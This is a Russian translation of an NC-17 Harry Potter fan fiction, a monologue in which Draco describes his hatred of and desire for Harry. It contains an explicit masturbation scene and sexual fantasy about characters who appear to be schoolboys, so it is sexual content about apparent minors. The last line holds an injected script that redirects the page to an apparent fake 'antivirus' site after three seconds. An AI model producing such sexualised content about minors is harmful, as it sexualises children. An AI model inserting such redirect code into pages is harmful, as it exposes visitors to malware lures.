Любовь и ненависть
Unrequited

Автор: Jade
Перевод: Кот Бегемот
Beta-reading: проф. Коровьев
Оригинал: http://www.psa.shadow-wrapped.net/hd/unrequited.html
Pairing: Драко/Гарри
Рейтинг: NC-17
Жанр: драма
Авторские права: Все права принадлежат Д. Роулинг, автор фан-фика не претендует на них и не пытается извлечь из своего рассказа никакой прибыли.
Комментарий переводчика: автор фика в своем письме разрешил скорректировать название, которое буквально переводится как "Невознагражденный". После нескольких запросов, мы остановились на "Любовь и ненависть", как это не банально звучит.

Я ненавижу его. Посмотрите на него: он золотой мальчик, а я - всего лишь заурядный блондин, ОН всеобщий герой, хотя не имеет никакого отношения к поражению Темного Лорда. Он - всеобщий любимец, несмотря даже на то, что не слишком успевает по школьным предметам. Это не справедливо. Я красив, богат, у меня есть все, чего душа желает или может пожелать. Я ненавижу ЕГО, так почему же я ЕГО так хочу?

Иногда мне становится жаль, что нельзя начать все сначала, словно ничего плохого и не было. Тогда появилась бы возможность уйти от того образа, который я создал, который не отражает моей истинной сущности. Я создал его для отца, чтобы тот гордился своей маленькой, но точной копией. Я надеваю эту маску для Крабба и Гойла, которые ни на что не способны, если только ими не управлять. Но разве они не почувствовали бы отвращение, если бы по-настоящему узнали меня? Узнали, что мне нравятся мальчики, а именно, Мальчик-Который-Выжил.

Более того, не просто нравится - я мечтаю о нем, мечтаю прикоснуться и поцеловать его. Я мечтаю о большем, чем прикосновение. Нет, не то чтобы я делал это раньше - просто рисую в своем воображении... Эту книжку я нашел в старом магазинчике, и с тех пор держу ее под матрацем - там есть изображения юношей, занимающихся.... Если немного прикрыть глаза и посмотреть под углом, то можно представить, что это мы с Гарри.

Более того, я до сих пор ни с кем даже не целовался. Только касался себя сам. И когда я занимаюсь ЭТИМ, все, что я вижу перед собой - это ОН. Уже позже, чувствуя отвращение к себе, я обещаю никогда больше ЭТИМ не заниматься, а потом снова вижу его, эти вечно непослушные волосы, пронзительные глаза, сладкую улыбку. Он, конечно, улыбается не мне, для меня он приберегает уничтожающие взгляды, но я, хоть это и глупо, возбуждаюсь даже от них.

И потом, находясь в душевой в полном одиночестве и думая о нем, я глажу член все быстрее и быстрее, прикусывая губу, чтобы не выкрикнуть его имя. Я сгибаюсь напротив стены, раздвигаю ноги, представляя, как он сзади обхватывает мои бедра, потом входит в меня снова и снова, как на этих картинках, которые меня больше не возбуждают, если только не представить на них меня и Гарри. Только тогда, когда в моем сознании появляется четкое представление, как Гарри снимает с меня одежду, целует меня и скользит рукой в мои расстегнутые брюки, я кончаю, содрогаясь и выплескивая свою неудовлетворенную страсть, только чтобы увидеть, как она исчезает, словно ее и не было. Такой навсегда останется и моя любовь к Гарри Поттеру - неразделенной, невысказанной, невозможной. Ни в этом мире, ни в любом другом. Я должен быть с ним жестоким, изводить и мучить его  - такова моя роль. У него - своя, и мы обречены играть их до конца.

Я знаю, что могу получить сколько угодно девушек и даже парней, но я не хочу их. Я хочу ЕГО, я нуждаюсь в НЕМ, и я ненавижу ЕГО.

 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>